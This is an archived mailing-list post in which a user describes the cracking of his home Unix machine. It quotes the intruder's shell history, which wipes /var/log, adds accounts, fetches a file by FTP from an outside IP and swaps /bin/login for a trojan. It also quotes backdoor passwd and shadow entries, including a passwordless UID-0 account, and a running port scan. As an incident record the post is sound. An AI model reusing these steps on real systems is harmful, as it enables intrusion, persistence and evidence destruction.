my home machine got cracked yesterday

Replies:

  • None.

Parents:

  • None.
I'm sending this here mainly for archival reasons... this is
probably mostly interesting to Unix geeks.

Around 3:41am yesterday, someone cracked into my home machine
(connected full-time via cablemodem) and used it to probe another
network. I was awake and working, and noticed something was up by
the unusual pattern of my cablemodem's lights.

I made the mistake of killing the attacker's connection before
securing my machine, then he/she apparently logged back in and
did something nasty, because my desktop disappeared and I couldn't
regain control by switching to a text console... had to reboot.
(first reboot since I installed the machine in January. :)

Of course, as soon as the screen went black I ripped out the
ethernet cable from the back of the machine, somewhat freaked out
at this point. ;)

After rebooting, I couldn't log in because my /bin/login had been
replaced with something else. So I reinstalled most of my base
system (which I would've done anyway, since I didn't know what
he/she had messed with), and compiled and installed ssh.

That'll teach me to run a system without software autoupgrades
and/or a firewall installed...

Here are more details from a message I sent to a list at work
yesterday:

> The first thing he did was rm -rf /var/log , so there isn't much
> of a log. I found this in /root/.bash_history:
>
>     cd /var/
>     rm -rf log
>     users
>     vhosts
>     uptime
>     exit
>     w
>     /usr/sbin/adduser mat
>     passwd mat
>     rm -rf /var/log/*
>     exit
>     cd /etc/
>     ls
>     pico inetd.conf
>     rm -rf /var/log/*
>     exit
>     mv login /bin
>     dir
>     w
>     mv login /bin
>     chmod 777 login
>     mv login /bin
>     pico login
>     cd /bin
>     dir
>     ftp 207.170.22.77
>     dir
>     pico login
>     rm login
>     cd /tmp
>     mv login /bin
>     chmod +x /bin/login
>     exit
>
> And he created some new entries in /etc/passwd and /etc/shadow:
>
>     own:x:0:0::/root:/bin/bash
>     adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash
>     mat:x:12818:12818::/home/mat:/bin/bash
>
>     own::10865:0:99999:7:-1:-1:134538460
>     adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
>     mat:$1$YR62NIer$Y7gtqjzDiT5ic1TLmEi5u/:11056:0:99999:7:-1:-1:134550500
>
> /home/mat doesn't have much of interest afterwards:
>
>     root@devo: mat> ll
>     total 32
>     drwx------   2 mat    mat        4096 Apr  9 16:54 ./
>     drwxr-xr-x  18 root   root       4096 Apr 10 03:53 ../
>     -rw-r--r--   1 mat    mat        1422 Apr  9 16:22 .Xdefaults
>     -rw-------   1 mat    mat          27 Apr  9 22:04 .bash_history
>     -rw-r--r--   1 mat    mat          24 Apr  9 16:22 .bash_logout
>     -rw-r--r--   1 mat    mat         230 Apr  9 16:22 .bash_profile
>     -rw-r--r--   1 mat    mat         124 Apr  9 16:22 .bashrc
>     -rw-r--r--   1 mat    mat        3394 Apr  9 16:22 .screenrc
>
> /home/mat/.bash_history contains:
>
>     Is
>     Ls
>     ls
>     ftp
>     w
>     ls
>     cd /root
>
> When I noticed some strange network traffic (from blinking lights
> on my cablemodem), I ran tcpdump to see what's up:
>
>   04:03:10 <ger-home> e-t, still there?
>   04:04:02 <ger-home> there's a ton of traffic coming into
>       [sic] my home machine... pings or probes or something.
>   04:04:16 <ger-home> 04:02:17.024287 >
>       r95aag008980.sbo-smr.ma.cable.rcn.com.2532 >
>       mnc-esp.ind.net.domain: S 548284530:548284530(0) win 32120
>       <mss 1460,sackOK,timestamp 614510582 0,nop,wscale 0> (DF)
>   04:04:17 <ger-home> 04:02:17.024350 >
>       r95aag008980.sbo-smr.ma.cable.rcn.com.2533 >
>       mnc-axis.ind.net.domain: S 546972039:546972039(0) win 32120
>       <mss 1460,sackOK,timestamp 614510582 0,nop,wscale 0> (DF)
>   04:04:55 <ger-home> yikes!
>   04:04:58 <ger-home> root      5228  0.0  0.6  1684  808
>       pts/24   S    03:56   0:00 sh ./ibind.sh 199.8
>   04:04:58 <ger-home> root      5238 98.7  0.3  1076  392
>       pts/24   R    03:56   8:21 ./pscan 199.8 53
>   04:05:35 <ger-home> and I just noticed my /var/log
>       disappeared... crap
>   04:05:41 <ger-home> (earlier tonight I noticed, I mean)
>   04:05:59 <ger-home> crap crap crap... I've been hacked
>
>   04:08:37 <-- ger-home has quit (EOF From client)
>
> [ reinstalled my base system, compiled and re-installed ssh ]
>
>   05:41:51 --> ger-home (~gerald@pfunk.w3.org) has joined &sysreq
>   05:43:13 <ger-home> what a $#%& pain
>   05:43:46 <ger-home> I killed the cracker's connection to my
>       machine, and he logged back in and killed my session...
>       had to reboot.
>   05:43:58 <ger-home> and he replaced my /bin/login with
>       something else, ...
>

--
Gerald Oskoboiny <gerald@impressive.net>
http://impressive.net/people/gerald/

HURL: fogo mailing list archives, maintained by Gerald Oskoboiny